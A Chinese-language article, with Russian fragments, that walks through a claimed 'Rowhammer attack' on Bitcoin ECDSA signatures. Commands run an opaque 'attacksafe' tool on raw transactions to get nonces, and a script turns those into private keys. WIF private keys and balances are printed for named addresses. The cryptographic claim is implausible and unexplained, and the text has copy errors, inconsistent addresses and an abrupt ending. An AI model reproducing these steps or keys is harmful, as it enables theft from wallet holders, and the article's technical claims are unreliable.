比特幣加密貨幣最大的密碼學優勢是離散數學中的一種計算方法(HNP)
,它以大整數因式分解問題和比特幣簽名交易中的隱數問題為基礎ECDSA
。
在本文中,我們將應用簽名故障差異分析ECDSA
並從五個不同比特幣錢包的交易中導出私鑰。Rowhammer Attack on Bitcoin
, 使我們能夠有效地找到以某個值為模的歸一化多項式的全零,並且我們將此方法應用於簽名算法,ECDSA
更準確地說,應用於比特幣區塊鏈中極易受到攻擊的交易。
我們將乘以有限域相同元素的不同冪,奇怪的是,它們可以重合併為我們提供有限域上的特定函數,可以使用拉格朗日插值多項式指定。


這種攻擊的理論部分可以在流行的比特幣攻擊列表中的文章中找到:“Rowhammer Attack on Bitcoin”

www.attacksafe.ru/rowhammer-attack-on-bitcoin
從我們早期的出版物ECDSA
中,我們知道比特幣區塊鏈中存在很多易受攻擊和薄弱的交易,並且在我們的密碼分析過程中,我們發現許多比特幣地址在洩露密鑰的情況下進行了大量簽名"K" (NONCE)
.
這樣一來,知道了秘鑰,我們就可以準確的獲取到比特幣錢包的私鑰了。
考慮五個比特幣地址:
1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
18hdfynnojmiMmBMsrkXNFWketq4mmDHB
14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
每個比特幣地址都進行了兩個關鍵的易受攻擊的交易:
1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o


18hdfynnojmiMmBMsrkXNFWketq4mmDHB


14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP


17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc


18vXv21kk8PfN4KRX5i19QvDRM855qheQ


比特幣區塊鏈中密鑰“K”(NONCE)的公開
使用我們的15RowhammerAttack存儲庫實施高效的Rowhammer 攻擊算法
git clone https://github.com/demining/CryptoDeepTools.git
cd CryptoDeepTools/15RowhammerAttack/
ls

安裝我們需要的所有包

requirements.txt
sudo apt install python2-minimal
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2 get-pip.py
pip2 install -r requirements.txt



為攻擊準備 RawTX
1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o

RawTX = 0100000001cb9a792b88760ad20c67047c06d016ba4a069d036c4fbc5c09a8055fe786580f300000006a4730440220331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc6702200bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff401210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
現在我們需要從所有易受攻擊的交易中獲取所有的 R、S、Z 值
讓我們使用 breakECDSA.py 腳本
python2 breakECDSA.py 0100000001cb9a792b88760ad20c67047c06d016ba4a069d036c4fbc5c09a8055fe786580f300000006a4730440220331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc6702200bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff401210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

R = 0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67
S = 0x0bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff4
Z = 0x9d86bea51385f6a56835d0148e7f23a353605bab339127e800112307e6727d2d
為了實施攻擊並獲取密鑰,我們將使用“ATTACKSAFE SOFTWARE”軟件

www.attacksafe.ru/software
訪問權限:
chmod +x attacksafe

應用:
./attacksafe -help

-version: software version
-list: list of bitcoin attacks
-tool: indicate the attack
-gpu: enable gpu
-time: work timeout
-server: server mode
-port: server port
-open: open file
-save: save file
-search: vulnerability search
-stop: stop at mode
-max: maximum quantity in mode
-min: minimum quantity per mode
-speed: boost speed for mode
-range: specific range
-crack: crack mode
-field: starting field
-point: starting point
-inject: injection regimen
-decode: decoding mode
./attacksafe -version

"ATTACKSAFE SOFTWARE"
包括對比特幣的所有流行攻擊。
讓我們列出所有攻擊:
./attacksafe -list



然後選擇 -tool: rowhammer_attack
要從易受攻擊的 ECDSA 簽名交易中獲取密鑰,讓我們將數據添加RawTX
到文本文檔並將其保存為文件RawTX.txt
0100000001cb9a792b88760ad20c67047c06d016ba4a069d036c4fbc5c09a8055fe786580f300000006a4730440220331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc6702200bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff401210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
-tool rowhammer_attack
使用軟件啟動“ATTACKSAFE SOFTWARE”
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

我們發起了這次攻擊-tool rowhammer_attack
並將結果保存到一個文件中SecretKey.txt
現在看到成功的結果,打開文件SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d
RawTX = 0100000001cb9a792b88760ad20c67047c06d016ba4a069d036c4fbc5c09a8055fe786580f300000006a4730440220331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc6702200bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff401210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
我們看到一個銘文"Deployments ECDSA"
,表示比特幣區塊鏈交易中存在嚴重漏洞。
SecretKey значение в формате HEX, это и есть наш секретный ключ "K" (NONCE):
K = 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d
讓我們用Python腳本檢查一下point2gen.py
為此,請安裝ECPy橢圓曲線庫:
pip3 install ECPy

現在讓我們通過指定運行腳本 секретный ключ "K" (NONCE)
:
python3 point2gen.py 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d

(0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67 , 0xc6efa8de714dd94d7b659d8935aa9036ada6a2b541a03360901fc195fd0e2cf6)
EC (secp256k1)
檢查具有簽名值的點的坐標R
R = 0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67
S = 0x0bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff4
Z = 0x9d86bea51385f6a56835d0148e7f23a353605bab339127e800112307e6727d2d
R = 0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67
point2gen = (0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67 , 0xc6efa8de714dd94d7b659d8935aa9036ada6a2b541a03360901fc195fd0e2cf6)
ВСЕ ВЕРНО!
K = 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d
現在知道了密鑰,我們可以得到比特幣錢包的私鑰:1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
讓我們使用Python腳本:calculate.py
> > > 獲取私鑰
讓我們打開代碼並添加簽名的所有值K, R, S, Z
def h(n):
return hex(n).replace("0x","")
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d
R = 0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67
S = 0x0bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff4
Z = 0x9d86bea51385f6a56835d0148e7f23a353605bab339127e800112307e6727d2d
print (h((((S * K) - Z) * modinv(R,N)) % N))
該腳本將使用以下公式計算私鑰:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
讓我們運行腳本:
python3 calculate.py

PrivKey = aa35fda8f16d06ae02bdcf671e03035795a0b0ecbdae45098928f6587016a932
讓我們打開bitaddress並檢查:
ADDR: 1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
WIF: L2vaWmjh7XpV9AMWDjmNSGPQNEd4QG7YGAMMqPEmGSt8WSppysCV
HEX: aa35fda8f16d06ae02bdcf671e03035795a0b0ecbdae45098928f6587016a932

Приватный ключ найден!

www.blockchain.com/btc/address/1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
BALANCE: $ 708.02
丟失 BTC 硬幣的潛在威脅在於比特幣區塊鏈交易的嚴重漏洞,因此我們強烈建議大家始終更新軟件並僅使用經過驗證的設備。
通過詳細的密碼分析,我們還在96c94c5b69c60ab4e3889b11fee54519fc6ff0f228f37554dd0dc766ab3909ef中發現了一個針對相同比特幣地址的嚴重漏洞 TXID:
為攻擊準備 RawTX
1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o

RawTX = 010000000104118e34a0d3c06c842d14707ed5f333d3ba1d35240086a4b5738a2fa810abec1d0000006a473044022004b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb20220282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad501210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff014e020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
現在我們需要從所有易受攻擊的交易中獲取所有的 R、S、Z 值
讓我們使用 breakECDSA.py 腳本
python2 breakECDSA.py 010000000104118e34a0d3c06c842d14707ed5f333d3ba1d35240086a4b5738a2fa810abec1d0000006a473044022004b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb20220282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad501210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff014e020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

R = 0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2
S = 0x282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad5
Z = 0x7270a25b48c53581f9babe8edcf27f9a038e7b57e817a8b242a49e2248bc71a7
要從易受攻擊的 ECDSA 簽名交易中獲取密鑰,讓我們將數據添加RawTX
到文本文檔並將其保存為文件RawTX.txt
010000000104118e34a0d3c06c842d14707ed5f333d3ba1d35240086a4b5738a2fa810abec1d0000006a473044022004b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb20220282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad501210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff014e020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
-tool rowhammer_attack
使用軟件啟動“ATTACKSAFE SOFTWARE”
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

我們發起了這次攻擊-tool rowhammer_attack
並將結果保存到一個文件中SecretKey.txt
現在看到成功的結果,打開文件SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3
RawTX = 010000000104118e34a0d3c06c842d14707ed5f333d3ba1d35240086a4b5738a2fa810abec1d0000006a473044022004b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb20220282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad501210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff014e020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
我們看到一個銘文"Deployments ECDSA"
,表示比特幣區塊鏈交易中存在嚴重漏洞。
SecretKey значение в формате HEX, это и есть наш секретный ключ "K" (NONCE):
K = 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3
讓我們用Python腳本檢查一下point2gen.py
讓我們使用ECPy橢圓曲線庫:
現在讓我們通過指定運行腳本 секретный ключ "K" (NONCE)
:
python3 point2gen.py 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3

(0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2 , 0x212c1b682ab25c069306f57725e904094c352014ea78903fbc153a129f3171e4)
EC (secp256k1)
檢查具有簽名值的點的坐標R
R = 0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2
S = 0x282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad5
Z = 0x7270a25b48c53581f9babe8edcf27f9a038e7b57e817a8b242a49e2248bc71a7
R = 0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2
point2gen = (0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2 , 0x212c1b682ab25c069306f57725e904094c352014ea78903fbc153a129f3171e4)
ВСЕ ВЕРНО!
K = 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3
現在知道了密鑰,我們可以得到比特幣錢包的私鑰:1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
讓我們使用 Python腳本: calculate.py
> > > 獲取私鑰
讓我們打開代碼並添加簽名的所有值K, R, S, Z
def h(n):
return hex(n).replace("0x","")
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3
R = 0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2
S = 0x282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad5
Z = 0x7270a25b48c53581f9babe8edcf27f9a038e7b57e817a8b242a49e2248bc71a7
print (h((((S * K) - Z) * modinv(R,N)) % N))
該腳本將使用以下公式計算私鑰:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
讓我們運行腳本:
python3 calculate.py

PrivKey = aa35fda8f16d06ae02bdcf671e03035795a0b0ecbdae45098928f6587016a932
讓我們打開bitaddress並檢查:
ADDR: 1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
WIF: L2vaWmjh7XpV9AMWDjmNSGPQNEd4QG7YGAMMqPEmGSt8WSppysCV
HEX: aa35fda8f16d06ae02bdcf671e03035795a0b0ecbdae45098928f6587016a932

Приватный ключ найден!

www.blockchain.com/btc/address/1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
BALANCE: $ 708.02
№2
通過詳細的密碼分析,我們還發現了比特幣地址中的一個嚴重漏洞:
18hdfynnojmiMmBMsrkXNFWketq4mmDHB


為攻擊準備 RawTX
18hdfynnojmiMmBMsrkXNFWketq4mmDHB

RawTX = 0100000001a11dd54f81e27ca14eaf9bb4c94e6b91398130bdb09a71fa2dccf994636de08a1d0000006b483045022100f6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386022048c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
現在我們需要從所有易受攻擊的交易中獲取所有的 R、S、Z 值
讓我們使用 breakECDSA.py 腳本
python2 breakECDSA.py 0100000001a11dd54f81e27ca14eaf9bb4c94e6b91398130bdb09a71fa2dccf994636de08a1d0000006b483045022100f6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386022048c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

R = 0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386
S = 0x48c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f
Z = 0x51e6147848d2e81e2b6b71a5f2b29be5121752b88cc1d5e1392c001b04b4c2d9
要從易受攻擊的 ECDSA 簽名交易中獲取密鑰,讓我們將數據添加RawTX
到文本文檔並將其保存為文件RawTX.txt
0100000001a11dd54f81e27ca14eaf9bb4c94e6b91398130bdb09a71fa2dccf994636de08a1d0000006b483045022100f6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386022048c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
-tool rowhammer_attack
使用軟件啟動“ATTACKSAFE SOFTWARE”
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

我們發起了這次攻擊-tool rowhammer_attack
並將結果保存到一個文件中SecretKey.txt
現在看到成功的結果,打開文件SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca
RawTX = 0100000001a11dd54f81e27ca14eaf9bb4c94e6b91398130bdb09a71fa2dccf994636de08a1d0000006b483045022100f6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386022048c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
我們看到一個銘文"Deployments ECDSA"
,表示比特幣區塊鏈交易中存在嚴重漏洞。
SecretKey значение в формате HEX, это и есть наш секретный ключ "K" (NONCE):
K = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca
讓我們用Python腳本檢查一下point2gen.py
讓我們使用ECPy橢圓曲線庫:
現在讓我們通過指定運行腳本 секретный ключ "K" (NONCE)
:
python3 point2gen.py 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca

(0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386 , 0x3f43332421ee70c0e0ccab01f0b916fdf087f1df6cd2227f6d8d7212a3e6f806)
EC (secp256k1)
檢查具有簽名值的點的坐標R
R = 0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386
S = 0x48c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f
Z = 0x51e6147848d2e81e2b6b71a5f2b29be5121752b88cc1d5e1392c001b04b4c2d9
R = 0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386
point2gen = (0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386 , 0x3f43332421ee70c0e0ccab01f0b916fdf087f1df6cd2227f6d8d7212a3e6f806)
ВСЕ ВЕРНО!
K = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca
現在知道了密鑰,我們可以得到比特幣錢包的私鑰:18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
讓我們使用 Python腳本: calculate.py
> > > 獲取私鑰
讓我們打開代碼並添加簽名的所有值K, R, S, Z
def h(n):
return hex(n).replace("0x","")
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca
R = 0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386
S = 0x48c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f
Z = 0x51e6147848d2e81e2b6b71a5f2b29be5121752b88cc1d5e1392c001b04b4c2d9
print (h((((S * K) - Z) * modinv(R,N)) % N))
該腳本將使用以下公式計算私鑰:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
讓我們運行腳本:
python3 calculate.py

PrivKey = 86990adfdb019df305b4d38a963c9f46a1fbeac332285d122b0e2f888de31fba
讓我們打開bitaddress並檢查:
ADDR: 18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
WIF: L1jMLZYkKr2YoTLH9xWXS9jPMgeasnTxWmGrHBK9aMCW9ahsNDzP
HEX: 86990adfdb019df305b4d38a963c9f46a1fbeac332285d122b0e2f888de31fba

Приватный ключ найден!

www.blockchain.com/btc/address/18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
BALANCE: $ 708.99
丟失 BTC 硬幣的潛在威脅在於比特幣區塊鏈交易的嚴重漏洞,因此我們強烈建議大家始終更新軟件並僅使用經過驗證的設備。
通過詳細的密碼分析,我們還在同一比特幣地址的cfc6047c1ad23ddb9d3e0151217fe62f045429ffb225e878a07a0db6f98fb9b3中發現了一個嚴重漏洞 TXID:
為攻擊準備 RawTX
18hdfynnojmiMmBMsrkXNFWketq4mmDHB

RawTX = 0100000001e4705464562efc76d90240841ff3ed91c8db0b58ee4666502cb0a35cd5611f990d0000006a4730440220682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e880220052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0158020000000000001976a914406840ebc10519e0934c739a83a2d51f70ff09ae88ac00000000
現在我們需要從所有易受攻擊的交易中獲取所有的 R、S、Z 值
讓我們使用 breakECDSA.py 腳本
python2 breakECDSA.py 0100000001e4705464562efc76d90240841ff3ed91c8db0b58ee4666502cb0a35cd5611f990d0000006a4730440220682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e880220052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0158020000000000001976a914406840ebc10519e0934c739a83a2d51f70ff09ae88ac00000000

R = 0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88
S = 0x052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9
Z = 0x395e27708f075827fc7b179382a2a5e13c7649a046a89f2937bc5754349cc05d
要從易受攻擊的 ECDSA 簽名交易中獲取密鑰,讓我們將數據添加RawTX
到文本文檔並將其保存為文件RawTX.txt
0100000001e4705464562efc76d90240841ff3ed91c8db0b58ee4666502cb0a35cd5611f990d0000006a4730440220682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e880220052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0158020000000000001976a914406840ebc10519e0934c739a83a2d51f70ff09ae88ac00000000
-tool rowhammer_attack
使用軟件啟動“ATTACKSAFE SOFTWARE”
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

我們發起了這次攻擊-tool rowhammer_attack
並將結果保存到一個文件中SecretKey.txt
現在看到成功的結果,打開文件SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0x093bf9a5eb46ddeff6bcf94a326d00f89bc0ce6cbada4c5897758550eae10383
RawTX = 0100000001e4705464562efc76d90240841ff3ed91c8db0b58ee4666502cb0a35cd5611f990d0000006a4730440220682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e880220052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0158020000000000001976a914406840ebc10519e0934c739a83a2d51f70ff09ae88ac00000000
我們看到一個銘文"Deployments ECDSA"
,表示比特幣區塊鏈交易中存在嚴重漏洞。
SecretKey значение в формате HEX, это и есть наш секретный ключ "K" (NONCE):
K = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca
讓我們用Python腳本檢查一下point2gen.py
讓我們使用ECPy橢圓曲線庫:
現在讓我們通過指定運行腳本 секретный ключ "K" (NONCE)
:
python3 point2gen.py 0x093bf9a5eb46ddeff6bcf94a326d00f89bc0ce6cbada4c5897758550eae10383

(0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88 , 0xbcf3873021aff3756d237abe2c29c074c77cd585d73a919135135150fcc30197)
EC (secp256k1)
檢查具有簽名值的點的坐標R
R = 0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88
S = 0x052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9
Z = 0x395e27708f075827fc7b179382a2a5e13c7649a046a89f2937bc5754349cc05d
R = 0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88
point2gen = (0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88 , 0xbcf3873021aff3756d237abe2c29c074c77cd585d73a919135135150fcc30197)
ВСЕ ВЕРНО!
K = 0x093bf9a5eb46ddeff6bcf94a326d00f89bc0ce6cbada4c5897758550eae10383
現在知道了密鑰,我們可以得到比特幣錢包的私鑰:18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
讓我們使用 Python腳本: calculate.py
> > > 獲取私鑰
讓我們打開代碼並添加簽名的所有值K, R, S, Z
def h(n):
return hex(n).replace("0x","")
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0x093bf9a5eb46ddeff6bcf94a326d00f89bc0ce6cbada4c5897758550eae10383
R = 0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88
S = 0x052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9
Z = 0x395e27708f075827fc7b179382a2a5e13c7649a046a89f2937bc5754349cc05d
print (h((((S * K) - Z) * modinv(R,N)) % N))
該腳本將使用以下公式計算私鑰:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
讓我們運行腳本:
python3 calculate.py

PrivKey = 86990adfdb019df305b4d38a963c9f46a1fbeac332285d122b0e2f888de31fba
讓我們打開bitaddress並檢查:
ADDR: 18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
WIF: L1jMLZYkKr2YoTLH9xWXS9jPMgeasnTxWmGrHBK9aMCW9ahsNDzP
HEX: 86990adfdb019df305b4d38a963c9f46a1fbeac332285d122b0e2f888de31fba

Приватный ключ найден!

www.blockchain.com/btc/address/18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
BALANCE: $ 708.99
№3
通過詳細的密碼分析,我們還發現了比特幣地址中的一個嚴重漏洞:
14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP


為攻擊準備 RawTX
14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP

